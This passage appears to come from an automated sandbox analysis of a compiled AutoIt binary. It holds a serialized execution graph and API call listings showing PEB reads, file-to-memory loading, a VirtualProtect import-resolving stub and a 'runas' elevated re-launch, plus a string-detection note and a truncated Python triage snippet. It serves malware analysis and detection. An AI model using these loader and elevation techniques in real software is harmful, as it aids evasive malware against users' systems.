98762->98709 98763->98715 98764->98715 98765->98715 98766->98686 98767->98715 98769 edf683 __NMSG_WRITE 98768->98769 98770 edf769 98769->98770 98771 edf6b8 98769->98771 98774 edf6c2 98769->98774 98770->98774 98777 e87a24 61 API calls 98770->98777 98771->98774 98776 e87a24 61 API calls 98771->98776 98774->98722 98774->98727 98775->98728 98776->98771 98777->98770 98778->98743 98779->98755 98781 e892c9 Mailbox 98780->98781 98782 ebf5c8 98781->98782 98787 e892d3 98781->98787 98783 ea0ff6 Mailbox 59 API calls 98782->98783 98785 ebf5d4 98783->98785 98784 e892da 98784->98759 98787->98784 98788 e89df0 59 API calls Mailbox 98787->98788 
98788->98787 98790 ed665e 98789->98790 98791 ed6641 98789->98791 98790->98402 98791->98790 98793 ed6621 59 API calls Mailbox 98791->98793 98793->98791 98794 ebff06 98795 ebff10 98794->98795 98798 e8ac90 Mailbox _memmove 98794->98798 98933 e88e34 59 API calls Mailbox 98795->98933 98810 e87f41 59 API calls 98798->98810 98819 e8a1b7 98798->98819 98823 e8a097 Mailbox 98798->98823 98824 ed66f4 Mailbox 59 API calls 98798->98824 98826 e8b416 98798->98826 98828 e8a000 340 API calls 98798->98828 98829 e8b685 98798->98829 98830 ec0c94 98798->98830 98832 ec0ca2 98798->98832 98835 e8b37c 98798->98835 98836 ea0ff6 59 API calls Mailbox 98798->98836 98843 e8ade2 Mailbox 98798->98843 98849 efc5f4 98798->98849 98881 ee7be0 98798->98881 98887 efbf80 98798->98887 98934 ed7405 59 API calls 98798->98934 98935 efc4a7 85 API calls 2 library calls 98798->98935 98800 ea0ff6 59 API calls Mailbox 98800->98823 98804 e8b5d5 98807 e881a7 59 API calls 98804->98807 98805 e881a7 59 API calls 98805->98823 98807->98819 98808 ec047f 98937 eea0b5 89 API calls 4 library calls 98808->98937 98810->98798 98812 e8b5da 98943 eea0b5 89 API calls 4 library calls 98812->98943 98813 ec048e 98814 e877c7 59 API calls 98814->98823 98815 ed7405 59 API calls 98815->98823 98817 ed66f4 Mailbox 59 API calls 98817->98819 98818 ec0e00 98942 eea0b5 89 API calls 4 library calls 98818->98942 98821 ea2f80 67 API calls __cinit 98821->98823 98823->98800 98823->98804 98823->98805 98823->98808 98823->98812 98823->98814 98823->98815 98823->98818 98823->98819 98823->98821 98825 e8a6ba 98823->98825 98927 e8ca20 340 API calls 2 library calls 98823->98927 98928 e8ba60 60 API calls Mailbox 98823->98928 98824->98798 98941 eea0b5 89 API calls 4 library calls 98825->98941 98932 e8f803 340 API calls 98826->98932 98828->98798 98938 eea0b5 89 API calls 4 library calls 98829->98938 98939 e89df0 59 API calls Mailbox 98830->98939 98940 eea0b5 89 API calls 4 library calls 98832->98940 98834 ec0c86 98834->98817 98834->98819 98930 e89e9c 60 API 
calls Mailbox 98835->98930 98836->98798 98838 e8b38d 98931 e89e9c 60 API calls Mailbox 98838->98931 98843->98819 98843->98829 98843->98834 98844 ec00e0 VariantClear 98843->98844 98845 ef474d 340 API calls 98843->98845 98846 eed2e6 101 API calls 98843->98846 98847 efe237 130 API calls 98843->98847 98848 e92123 95 API calls 98843->98848 98929 e89df0 59 API calls Mailbox 98843->98929 98936 ed7405 59 API calls 98843->98936 98844->98843 98845->98843 98846->98843 98847->98843 98848->98843 98850 e877c7 59 API calls 98849->98850 98851 efc608 98850->98851 98852 e877c7 59 API calls 98851->98852 98853 efc610 98852->98853 98854 e877c7 59 API calls 98853->98854 98855 efc618 98854->98855 98856 e89997 84 API calls 98855->98856 98880 efc626 98856->98880 98857 e87a84 59 API calls 98857->98880 98858 e87d2c 59 API calls 98858->98880 98859 efc80f 98860 efc83c Mailbox 98859->98860 98861 e89b9c 59 API calls 98859->98861 98860->98798 98861->98860 98862 efc7f6 98945 e87e0b 98862->98945 98864 efc811 98866 e87e0b 59 API calls 98864->98866 98870 efc820 98866->98870 98867 e881a7 59 API calls 98867->98880 98868 e87faf 59 API calls 98872 efc6bd CharUpperBuffW 98868->98872 98869 e87c8e 59 API calls 98869->98859 98873 e87c8e 59 API calls 98870->98873 98871 e87faf 59 API calls 98874 efc77d CharUpperBuffW 98871->98874 98944 e8859a 68 API calls 98872->98944 98873->98859 98876 e8c707 69 API calls 98874->98876 98876->98880 98877 e89997 84 API calls 98877->98880 98878 e87e0b 59 API calls 98878->98880 98879 e87c8e 59 API calls 98879->98880 98880->98857 98880->98858 98880->98859 98880->98860 98880->98862 98880->98864 98880->98867 98880->98868 98880->98871 98880->98877 98880->98878 98880->98879 98882 ee7bec 98881->98882 98883 ea0ff6 Mailbox 59 API calls 98882->98883 98884 ee7bfa 98883->98884 98885 ee7c08 98884->98885 98886 e877c7 59 API calls 98884->98886 98885->98798 98886->98885 98888 efbfab 98887->98888 98889 efbfc5 98887->98889 98957 eea0b5 89 API calls 4 library calls 98888->98957 98958 efa528 59 API 
calls Mailbox 98889->98958 98892 efbfd0 98893 e8a000 339 API calls 98892->98893 98894 efc031 98893->98894 98895 efc0c3 98894->98895 98899 efc072 98894->98899 98920 efbfbd Mailbox 98894->98920 98896 efc119 98895->98896 98897 efc0c9 98895->98897 98898 e89997 84 API calls 98896->98898 98896->98920 98979 ee7ba4 59 API calls 98897->98979 98900 efc12b 98898->98900 98959 ee7581 59 API calls Mailbox 98899->98959 98903 e87faf 59 API calls 98900->98903 98906 efc14f CharUpperBuffW 98903->98906 98904 efc0ec 98980 e85ea1 59 API calls Mailbox 98904->98980 98905 efc0a2 98960 e8f5c0 98905->98960 98910 efc169 98906->98910 98909 efc0f4 Mailbox 98981 e8fe40 340 API calls 2 library calls 98909->98981 98911 efc1bc 98910->98911 98912 efc170 98910->98912 98914 e89997 84 API calls 98911->98914 98982 ee7581 59 API calls Mailbox 98912->98982 98915 efc1c4 98914->98915 98983 e89fbd 60 API calls 98915->98983 98918 efc19e 98919 e8f5c0 339 API calls 98918->98919 98919->98920 98920->98798 98921 efc1ce 98921->98920 98922 e89997 84 API calls 98921->98922 98923 efc1e9 98922->98923 98984 e85ea1 59 API calls Mailbox 98923->98984 98925 efc1f9 98985 e8fe40 340 API calls 2 library calls 98925->98985 98927->98823 98928->98823 98929->98843 98930->98838 98931->98826 98932->98829 98933->98798 98934->98798 98935->98798 98936->98843 98937->98813 98938->98834 98939->98834 98940->98834 98941->98819 98942->98812 98943->98819 98944->98880 98946 e87e1f 98945->98946 98947 ebf173 98945->98947 98952 e87db0 98946->98952 98949 e88189 59 API calls 98947->98949 98951 ebf17e __NMSG_WRITE _memmove 98949->98951 98950 e87e2a 98950->98869 98953 e87dbf __NMSG_WRITE 98952->98953 98954 e88189 59 API calls 98953->98954 98955 e87dd0 _memmove 98953->98955 98956 ebf130 _memmove 98954->98956 98955->98950 98957->98920 98958->98892 98959->98905 98961 e8f61a 98960->98961 98962 e8f7b0 98960->98962 98963 ec4848 98961->98963 98964 e8f626 98961->98964 98965 e87f41 59 API calls 98962->98965 98966 efbf80 340 API calls 98963->98966 98986 e8f3f0 
98964->98986 98971 e8f6ec Mailbox 98965->98971 98968 ec4856 98966->98968 98972 e8f790 98968->98972 99091 eea0b5 89 API calls 4 library calls 98968->99091 98970 e8f65d 98970->98968 98970->98971 98970->98972 98978 ee3e73 3 API calls 98971->98978 99001 eecde5 98971->99001 99081 e84faa 98971->99081 99087 efe24b 98971->99087 98972->98920 98974 e8f743 98974->98972 99090 e89df0 59 API calls Mailbox 98974->99090 98978->98974 98979->98904 98980->98909 98981->98920 98982->98918 98983->98921 98984->98925 98985->98920 98987 e8f59a 98986->98987 98989 e8f41c 98986->98989 99093 eea0b5 89 API calls 4 library calls 98987->99093 98989->98987 98998 e8f459 _memmove 98989->98998 98990 e8f533 98991 e8f543 98990->98991 99092 efa5ee 85 API calls Mailbox 98990->99092 98991->98970 98993 ea0ff6 59 API calls Mailbox 98993->98998 98994 ec4823 99095 e8f803 340 API calls 98994->99095 98996 e8a000 340 API calls 98996->98998 98997 ec47d3 98997->98970 98998->98990 98998->98993 98998->98994 98998->98996 98998->98997 98999 ec47d5 98998->98999 99094 eea0b5 89 API calls 4 library calls 98999->99094 99002 e877c7 59 API calls 99001->99002 99003 eece1a 99002->99003 99004 e877c7 59 API calls 99003->99004 99005 eece23 99004->99005 99006 eece37 99005->99006 99229 e89c9c 59 API calls 99005->99229 99008 e89997 84 API calls 99006->99008 99009 eece54 99008->99009 99010 eece76 99009->99010 99011 eecf55 99009->99011 99023 eecf85 Mailbox 99009->99023 99012 e89997 84 API calls 99010->99012 99096 e84f3d 99011->99096 99014 eece82 99012->99014 99016 e881a7 59 API calls 99014->99016 99018 eece8e 99016->99018 99017 eecf81 99020 e877c7 59 API calls 99017->99020 99017->99023 99025 eeced4 99018->99025 99026 eecea2 99018->99026 99019 e84f3d 135 API calls 99019->99017 99021 eecfb6 99020->99021 99022 e877c7 59 API calls 99021->99022 99024 eecfbf 99022->99024 99023->98974 99028 e877c7 59 API calls 99024->99028 99027 e89997 84 API calls 99025->99027 99029 e881a7 59 API calls 99026->99029 99030 eecee1 99027->99030 99031 eecfc8 
99028->99031 99032 eeceb2 99029->99032 99033 e881a7 59 API calls 99030->99033 99034 e877c7 59 API calls 99031->99034 99035 e87e0b 59 API calls 99032->99035 99036 eeceed 99033->99036 99037 eecfd1 99034->99037 99038 eecebc 99035->99038 99230 ee4cd3 GetFileAttributesW 99036->99230 99040 e89997 84 API calls 99037->99040 99041 e89997 84 API calls 99038->99041 99043 eecfde 99040->99043 99044 eecec8 99041->99044 99042 eecef6 99045 eecf09 99042->99045 99048 e87b52 59 API calls 99042->99048 99046 e846f9 59 API calls 99043->99046 99047 e87c8e 59 API calls 99044->99047 99050 e89997 84 API calls 99045->99050 99055 eecf0f 99045->99055 99049 eecff9 99046->99049 99047->99025 99048->99045 99051 e87b52 59 API calls 99049->99051 99052 eecf36 99050->99052 99054 eed008 99051->99054 99231 ee3a2b 75 API calls Mailbox 99052->99231 99056 eed03c 99054->99056 99058 e87b52 59 API calls 99054->99058 99055->99023 99057 e881a7 59 API calls 99056->99057 99059 eed04a 99057->99059 99060 eed019 99058->99060 99061 e87c8e 59 API calls 99059->99061 99060->99056 99062 e87d2c 59 API calls 99060->99062 99063 eed058 99061->99063 99064 eed02e 99062->99064 99065 e87c8e 59 API calls 99063->99065 99066 e87d2c 59 API calls 99064->99066 99067 eed066 99065->99067 99066->99056 99068 e87c8e 59 API calls 99067->99068 99069 eed074 99068->99069 99070 e89997 84 API calls 99069->99070 99071 eed080 99070->99071 99120 ee42ad 99071->99120 99073 eed091 99074 ee3e73 3 API calls 99073->99074 99075 eed09b 99074->99075 99076 e89997 84 API calls 99075->99076 99080 eed0cc 99075->99080 99077 eed0b9 99076->99077 99174 ee93df 99077->99174 99079 e84faa 84 API calls 99079->99023 99080->99079 99082 e84fbb 99081->99082 99083 e84fb4 99081->99083 99085 e84fca 99082->99085 99086 e84fdb FreeLibrary 99082->99086 99084 ea55d6 __fcloseall 83 API calls 99083->99084 99084->99082 99085->98974 99086->99085 99088 efcdf1 130 API calls 99087->99088 99089 efe25b 99088->99089 99089->98974 99090->98974 99091->98972 99092->98991 99093->98997 
99094->98997 99095->98997 99232 e84d13 99096->99232 99101 e84f68 LoadLibraryExW 99242 e84cc8 99101->99242 99102 ebdd0f 99104 e84faa 84 API calls 99102->99104 99106 ebdd16 99104->99106 99108 e84cc8 3 API calls 99106->99108 99110 ebdd1e 99108->99110 99109 e84f8f 99109->99110 99111 e84f9b 99109->99111 99268 e8506b 99110->99268 99113 e84faa 84 API calls 99111->99113 99115 e84fa0 99113->99115 99115->99017 99115->99019 99117 ebdd45 99276 e85027 99117->99276 99121 ee42c9 99120->99121 99122 ee42ce 99121->99122 99123 ee42dc 99121->99123 99124 e881a7 59 API calls 99122->99124 99125 e877c7 59 API calls 99123->99125 99126 ee42d7 Mailbox 99124->99126 99127 ee42e4 99125->99127 99126->99073 99128 e877c7 59 API calls 99127->99128 99129 ee42ec 99128->99129 99130 e877c7 59 API calls 99129->99130 99131 ee42f7 99130->99131 99132 e877c7 59 API calls 99131->99132 99133 ee42ff 99132->99133 99134 e877c7 59 API calls 99133->99134 99135 ee4307 99134->99135 99136 e877c7 59 API calls 99135->99136 99137 ee430f 99136->99137 99138 e877c7 59 API calls 99137->99138 99139 ee4317 99138->99139 99140 e877c7 59 API calls 99139->99140 99141 ee431f 99140->99141 99142 e846f9 59 API calls 99141->99142 99143 ee4336 99142->99143 99144 e846f9 59 API calls 99143->99144 99145 ee434f 99144->99145 99146 e87b52 59 API calls 99145->99146 99147 ee435b 99146->99147 99148 ee436e 99147->99148 99149 e87e8c 59 API calls 99147->99149 99150 e87b52 59 API calls 99148->99150 99149->99148 99151 ee4377 99150->99151 99152 ee4387 99151->99152 99153 e87e8c 59 API calls 99151->99153 99154 e881a7 59 API calls 99152->99154 99153->99152 99155 ee4393 99154->99155 99156 e87c8e 59 API calls 99155->99156 99157 ee439f 99156->99157 99703 ee445f 59 API calls 99157->99703 99159 ee43ae 99704 ee445f 59 API calls 99159->99704 99161 ee43c1 99162 e87b52 59 API calls 99161->99162 99163 ee43cb 99162->99163 99164 ee43e2 99163->99164 99165 ee43d0 99163->99165 99166 e87b52 59 API calls 99164->99166 99167 e87e0b 59 API calls 99165->99167 99168 ee43eb 
99166->99168 99169 ee43dd 99167->99169 99170 ee4409 99168->99170 99171 e87e0b 59 API calls 99168->99171 99172 e87c8e 59 API calls 99169->99172 99173 e87c8e 59 API calls 99170->99173 99171->99169 99172->99170 99173->99126 99175 ee93ec __write_nolock 99174->99175 99176 ea0ff6 Mailbox 59 API calls 99175->99176 99177 ee9449 99176->99177 99178 e8538e 59 API calls 99177->99178 99179 ee9453 99178->99179 99180 ee91e9 GetSystemTimeAsFileTime 99179->99180 99181 ee945e 99180->99181 99182 e85045 85 API calls 99181->99182 99183 ee9471 _wcscmp 99182->99183 99184 ee9495 99183->99184 99185 ee9542 99183->99185 99735 ee99be 99184->99735 99187 ee99be 96 API calls 99185->99187 99202 ee950e _wcscat 99187->99202 99190 e8506b 74 API calls 99192 ee9567 99190->99192 99191 ee954b 99191->99080 99193 e8506b 74 API calls 99192->99193 99195 ee9577 99193->99195 99194 ee94c3 _wcscat _wcscpy 99742 ea432e 58 API calls __wsplitpath_helper 99194->99742 99196 e8506b 74 API calls 99195->99196 99198 ee9592 99196->99198 99199 e8506b 74 API calls 99198->99199 99200 ee95a2 99199->99200 99201 e8506b 74 API calls 99200->99201 99203 ee95bd 99201->99203 99202->99190 99202->99191 99204 e8506b 74 API calls 99203->99204 99205 ee95cd 99204->99205 99206 e8506b 74 API calls 99205->99206 99207 ee95dd 99206->99207 99208 e8506b 74 API calls 99207->99208 99209 ee95ed 99208->99209 99705 ee9b6d GetTempPathW GetTempFileNameW 99209->99705 99211 ee95f9 99212 ea548b 115 API calls 99211->99212 99214 ee960a 99212->99214 99214->99191 99216 e8506b 74 API calls 99214->99216 99227 ee96c4 99214->99227 99706 ea4a93 99214->99706 99215 ee96cf 99217 ee96e9 99215->99217 99218 ee96d5 DeleteFileW 99215->99218 99216->99214 99219 ee978f CopyFileW 99217->99219 99222 ee96f3 _wcsncpy 99217->99222 99218->99191 99719 ea55d6 99227->99719 99229->99006 99230->99042 99231->99055 99281 e84d61 99232->99281 99235 e84d3a 99237 e84d4a FreeLibrary 99235->99237 99238 e84d53 99235->99238 99236 e84d61 2 API calls 99236->99235 99237->99238 99239 ea548b 
99238->99239 99285 ea54a0 99239->99285 99241 e84f5c 99241->99101 99241->99102 99442 e84d94 99242->99442 99245 e84ced 99247 e84d08 99245->99247 99248 e84cff FreeLibrary 99245->99248 99246 e84d94 2 API calls 99246->99245 99249 e84dd0 99247->99249 99248->99247 99250 ea0ff6 Mailbox 59 API calls 99249->99250 99251 e84de5 99250->99251 99252 e8538e 59 API calls 99251->99252 99253 e84df1 _memmove 99252->99253 99254 e84e2c 99253->99254 99256 e84ee9 99253->99256 99257 e84f21 99253->99257 99255 e85027 69 API calls 99254->99255 99263 e84e35 99255->99263 99446 e84fe9 99256->99446 99458 ee9ba5 95 API calls 99257->99458 99260 e8506b 74 API calls 99260->99263 99262 e84ec9 99262->99109 99263->99260 99263->99262 99264 ebdcd0 99263->99264 99453 e85045 99263->99453 99265 e85045 85 API calls 99264->99265 99266 ebdce4 99265->99266 99267 e8506b 74 API calls 99266->99267 99267->99262 99269 e8507d 99268->99269 99270 ebddf6 99268->99270 99482 ea5812 99269->99482 99273 ee9393 99680 ee91e9 99273->99680 99275 ee93a9 99275->99117 99277 e85036 99276->99277 99279 ebddb9 99276->99279 99685 ea5e90 99277->99685 99280 e8503e 99282 e84d2e 99281->99282 99283 e84d6a LoadLibraryA 99281->99283 99282->99235 99282->99236 99283->99282 99284 e84d7b GetProcAddress 99283->99284 99284->99282 99286 ea54ac _raise 99285->99286 99287 ea54bf 99286->99287 99290 ea54f0 99286->99290 99334 ea8d68 58 API calls __getptd_noexit 99287->99334 99289 ea54c4 99335 ea8ff6 9 API calls __wctomb_s_l 99289->99335 99304 eb0738 99290->99304 99293 ea54f5 99294 ea550b 99293->99294 99295 ea54fe 99293->99295 99296 ea5535 99294->99296 99297 ea5515 99294->99297 99336 ea8d68 58 API calls __getptd_noexit 99295->99336 99319 eb0857 99296->99319 99337 ea8d68 58 API calls __getptd_noexit 99297->99337 99301 ea54cf _raise @_EH4_CallFilterFunc@8 99301->99241 99305 eb0744 _raise 99304->99305 99306 ea9e4b __lock 58 API calls 99305->99306 99317 eb0752 99306->99317 99307 eb07c6 99339 eb084e 99307->99339 99308 eb07cd 99344 ea8a5d 58 API calls 2 library 
calls 99308->99344 99311 eb07d4 99311->99307 99345 eaa06b InitializeCriticalSectionAndSpinCount 99311->99345 99312 eb0843 _raise 99312->99293 99314 ea9ed3 __mtinitlocknum 58 API calls 99314->99317 99316 eb07fa RtlEnterCriticalSection 99316->99307 99317->99307 99317->99308 99317->99314 99342 ea6e8d 59 API calls __lock 99317->99342 99343 ea6ef7 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 99317->99343 99320 eb0877 __wopenfile 99319->99320 99321 eb0891 99320->99321 99333 eb0a4c 99320->99333 99352 ea3a0b 60 API calls 2 library calls 99320->99352 99350 ea8d68 58 API calls __getptd_noexit 99321->99350 99323 eb0896 99351 ea8ff6 9 API calls __wctomb_s_l 99323->99351 99325 ea5540 99338 ea5562 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 99325->99338 99326 eb0aaf 99347 eb87f1 99326->99347 99329 eb0a45 99329->99333 99353 ea3a0b 60 API calls 2 library calls 99329->99353 99331 eb0a64 99331->99333 99354 ea3a0b 60 API calls 2 library calls 99331->99354 99333->99321 99333->99326 99334->99289 99335->99301 99336->99301 99337->99301 99338->99301 99346 ea9fb5 RtlLeaveCriticalSection 99339->99346 99341 eb0855 99341->99312 99342->99317 99343->99317 99344->99311 99345->99316 99346->99341 99355 eb7fd5 99347->99355 99349 eb880a 99349->99325 99350->99323 99351->99325 99352->99329 99353->99331 99354->99333 99356 eb7fe1 _raise 99355->99356 99357 eb7ff7 99356->99357 99359 eb802d 99356->99359 99439 ea8d68 58 API calls __getptd_noexit 99357->99439 99366 eb809e 99359->99366 99360 eb7ffc 99440 ea8ff6 9 API calls __wctomb_s_l 99360->99440 99363 eb8049 99441 eb8072 RtlLeaveCriticalSection __unlock_fhandle 99363->99441 99364 eb8006 _raise 99364->99349 99367 eb80be 99366->99367 99368 ea471a __wsopen_nolock 58 API calls 99367->99368 99371 eb80da 99368->99371 99369 ea9006 __invoke_watson 8 API calls 99370 eb87f0 99369->99370 99373 eb7fd5 __wsopen_helper 103 API calls 99370->99373 99372 eb8114 99371->99372 99379 eb8137 99371->99379 99389 eb8211 99371->99389 99374 ea8d34 __write 58 
API calls 99372->99374 99375 eb880a 99373->99375 99376 eb8119 99374->99376 99375->99363 99377 ea8d68 __wctomb_s_l 58 API calls 99376->99377 99378 eb8126 99377->99378 99381 ea8ff6 __wctomb_s_l 9 API calls 99378->99381 99380 eb81f5 99379->99380 99388 eb81d3 99379->99388 99382 ea8d34 __write 58 API calls 99380->99382 99383 eb8130 99381->99383 99384 eb81fa 99382->99384 99383->99363 99385 ea8d68 __wctomb_s_l 58 API calls 99384->99385 99386 eb8207 99385->99386 99387 ea8ff6 __wctomb_s_l 9 API calls 99386->99387 99387->99389 99390 ead4d4 __alloc_osfhnd 61 API calls 99388->99390 99389->99369 99391 eb82a1 99390->99391 99392 eb82ab 99391->99392 99393 eb82ce 99391->99393 99395 ea8d34 __write 58 API calls 99392->99395 99394 eb7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99393->99394 99403 eb82f0 99394->99403 99396 eb82b0 99395->99396 99398 ea8d68 __wctomb_s_l 58 API calls 99396->99398 99397 eb836e GetFileType 99401 eb83bb 99397->99401 99402 eb8379 GetLastError 99397->99402 99400 eb82ba 99398->99400 99399 eb833c GetLastError 99404 ea8d47 __dosmaperr 58 API calls 99399->99404 99405 ea8d68 __wctomb_s_l 58 API calls 99400->99405 99412 ead76a __set_osfhnd 59 API calls 99401->99412 99406 ea8d47 __dosmaperr 58 API calls 99402->99406 99403->99397 99403->99399 99408 eb7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99403->99408 99409 eb8361 99404->99409 99405->99383 99407 eb83a0 CloseHandle 99406->99407 99407->99409 99410 eb83ae 99407->99410 99411 eb8331 99408->99411 99414 ea8d68 __wctomb_s_l 58 API calls 99409->99414 99413 ea8d68 __wctomb_s_l 58 API calls 99410->99413 99411->99397 99411->99399 99417 eb83d9 99412->99417 99415 eb83b3 99413->99415 99414->99389 99415->99409 99416 eb8594 99416->99389 99419 eb8767 CloseHandle 99416->99419 99417->99416 99418 eb1b11 __lseeki64_nolock 60 API calls 99417->99418 99434 eb845a 99417->99434 99420 eb8443 99418->99420 99421 eb7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99419->99421 99422 ea8d34 
__write 58 API calls 99420->99422 99420->99434 99423 eb878e 99421->99423 99422->99434 99424 eb87c2 99423->99424 99425 eb8796 GetLastError 99423->99425 99424->99389 99426 ea8d47 __dosmaperr 58 API calls 99425->99426 99427 eb87a2 99426->99427 99430 ead67d __free_osfhnd 59 API calls 99427->99430 99428 eb0d2d __close_nolock 61 API calls 99428->99434 99429 eb10ab 70 API calls __read_nolock 99429->99434 99430->99424 99431 eb99f2 __chsize_nolock 82 API calls 99431->99434 99432 eadac6 __write 78 API calls 99432->99434 99433 eb8611 99435 eb0d2d __close_nolock 61 API calls 99433->99435 99434->99416 99434->99428 99434->99429 99434->99431 99434->99432 99434->99433 99437 eb1b11 60 API calls __lseeki64_nolock 99434->99437 99436 eb8618 99435->99436 99438 ea8d68 __wctomb_s_l 58 API calls 99436->99438 99437->99434 99438->99389 99439->99360 99440->99364 99441->99364 99443 e84ce1 99442->99443 99444 e84d9d LoadLibraryA 99442->99444 99443->99245 99443->99246 99444->99443 99445 e84dae GetProcAddress 99444->99445 99445->99443 99447 e84fff 99446->99447 99448 e85003 FindResourceExW 99447->99448 99450 e85020 99447->99450 99449 ebdd5c LoadResource 99448->99449 99448->99450 99449->99450 99451 ebdd71 SizeofResource 99449->99451 99450->99254 99451->99450 99452 ebdd85 LockResource 99451->99452 99452->99450 99454 e85054 99453->99454 99457 ebddd4 99453->99457 99459 ea5a7d 99454->99459 99456 e85062 99456->99263 99458->99254 99460 ea5a89 _raise 99459->99460 99461 ea5a9b 99460->99461 99463 ea5ac1 99460->99463 99472 ea8d68 58 API calls __getptd_noexit 99461->99472 99474 ea6e4e 99463->99474 99464 ea5aa0 99473 ea8ff6 9 API calls __wctomb_s_l 99464->99473 99469 ea5ad6 99481 ea5af8 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 99469->99481 99471 ea5aab _raise 99471->99456 99472->99464 99473->99471 99475 ea6e5e 99474->99475 99476 ea6e80 RtlEnterCriticalSection 99474->99476 99475->99476 99477 ea6e66 99475->99477 99478 ea5ac7 99476->99478 99479 ea9e4b __lock 58 API calls 99477->99479 99480 ea59ee 
Execution graph (continued). The serialized node/edge data of the interactive execution graph is omitted here; the API call sites it recorded, grouped by code region, are:
• 00EA0000-00EB6000: C runtime start-up and I/O internals (GetStartupInfoW, GetProcessHeap, TlsAlloc/TlsSetValue, GetCurrentThreadId, GetCommandLineW, GetEnvironmentStringsW/FreeEnvironmentStringsW, GetModuleFileNameW, GetStdHandle, GetFileType, InitializeCriticalSectionAndSpinCount, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter/UnhandledExceptionFilter, RtlEncodePointer/RtlDecodePointer, RtlAllocateHeap, GetCurrentProcess/TerminateProcess, GetSystemTimeAsFileTime, and ReadFile/GetConsoleMode/ReadConsoleW/MultiByteToWideChar under __read_nolock at 00EB10AB).
• 00E83000-00E96000 (AutoIt runtime): GetCurrentDirectoryW, IsDebuggerPresent, MessageBoxA and SetCurrentDirectoryW at 00E83B4C; GetVersionExW, GetCurrentProcess/IsWow64Process, GetSystemInfo and GetNativeSystemInfo resolved via LoadLibraryA/GetProcAddress and released with FreeLibrary at 00E84A94; RegOpenKeyExW/RegQueryValueExW/RegCloseKey at 00E872F4 and 00E835C4; GetModuleFileNameW, GetFullPathNameW and GetLongPathNameW at 00E84864, 00E848AE, 00EA074F and 00EA09D5; GetStdHandle, OleInitialize, CreateThread and CloseHandle at 00E8F8CF; RegisterClipboardFormatW at 00E962A5; SystemParametersInfoW at 00E84A5B and 00E849C2; the window procedure at 00E83633 (PostQuitMessage, DefWindowProcW labelled NtdllDefWindowProc_W, SetTimer, KillTimer, RegisterClipboardFormatW, CreatePopupMenu, Shell_NotifyIconW, MoveWindow, SetFocus, DeleteObject/DestroyWindow). Two call targets appear only as raw addresses (745CC8D0 at 00E84982, 75B5D0D0 at 00EBEE67), i.e. pointers the snapshot did not symbolise.
• 00E20000-00E23580, outside the AutoIt runtime: reads the PEB (the plugin's GetPEB label at 00E234F0 and 00E23550), calls Sleep at 00E222A9, and at 00E22640 opens a file with CreateFileW, allocates with VirtualAlloc, reads it in with ReadFile, allocates again, and releases with VirtualFree (00E22850, 00E2292C) and a handle close labelled FindCloseChangeNotification (00E22840), a label that in practice usually denotes CloseHandle because the two kernel32 exports share an address.
• 00FB20A0-00FB2274: a stub that resolves imports with LoadLibraryA (00FB21CA) and GetProcAddress (00FB21F3), changes page protections with two VirtualProtect calls (00FB220F) and can terminate via ExitProcess (00FB2209).

                    Control-flow Graph (function at 00E83B4C; the interactive graph is not reproduced here, its API call sites are listed below)

                    APIs
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E83B7A
                    • IsDebuggerPresent.KERNEL32 ref: 00E83B8C
                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00F462F8,00F462E0,?,?), ref: 00E83BFD
                      • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                      • Part of subcall function 00E90A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E83C26,00F462F8,?,?,?), ref: 00E90ACE
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E83C81
                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00F393F0,00000010), ref: 00EBD4BC
                    • SetCurrentDirectoryW.KERNEL32(?,00F462F8,?,?,?), ref: 00EBD4F4
                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F35D40,00F462F8,?,?,?), ref: 00EBD57A
                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00EBD581
                      • Part of subcall function 00E83A58: GetSysColorBrush.USER32(0000000F), ref: 00E83A62
                      • Part of subcall function 00E83A58: LoadCursorW.USER32(00000000,00007F00), ref: 00E83A71
                      • Part of subcall function 00E83A58: LoadIconW.USER32(00000063), ref: 00E83A88
                      • Part of subcall function 00E83A58: LoadIconW.USER32(000000A4), ref: 00E83A9A
                      • Part of subcall function 00E83A58: LoadIconW.USER32(000000A2), ref: 00E83AAC
                      • Part of subcall function 00E83A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E83AD2
                      • Part of subcall function 00E83A58: RegisterClassExW.USER32(?), ref: 00E83B28
                      • Part of subcall function 00E839E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E83A15
                      • Part of subcall function 00E839E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E83A36
                      • Part of subcall function 00E839E7: ShowWindow.USER32(00000000,?,?), ref: 00E83A4A
                      • Part of subcall function 00E839E7: ShowWindow.USER32(00000000,?,?), ref: 00E83A53
                      • Part of subcall function 00E843DB: _memset.LIBCMT ref: 00E84401
                      • Part of subcall function 00E843DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E844A6
                    Strings
                    • This is a third-party compiled AutoIt script., xrefs: 00EBD4B4
                    • runas, xrefs: 00EBD575
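                    The two strings above, read together with the API list, are the standard AutoIt runtime behaviour behind the "Binary is likely a compiled AutoIt script file" signature: the narrow string is passed to MessageBoxA, whereas "AutoIt v3" (the window class and title passed to CreateWindowExW) and the "runas" verb passed to ShellExecuteW are wide strings, and "runas" asks the shell for an elevated (UAC-prompted) re-launch of the process. A string signature that searches only one encoding therefore misses the other. The following is an added triage example, not Joe Sandbox or AutoIt code: it scans a buffer for these strings in the encoding each API implies, reports where they occur, and emits the matching YARA string modifiers. The sample buffer is constructed for the example and is not bytes taken from the submitted file.

```python
"""Scan a PE image or memory dump for the AutoIt runtime strings shown in the
report above, in the encoding each consuming API implies.
Added example; not part of the Joe Sandbox report or the AutoIt runtime."""
from typing import Dict, List

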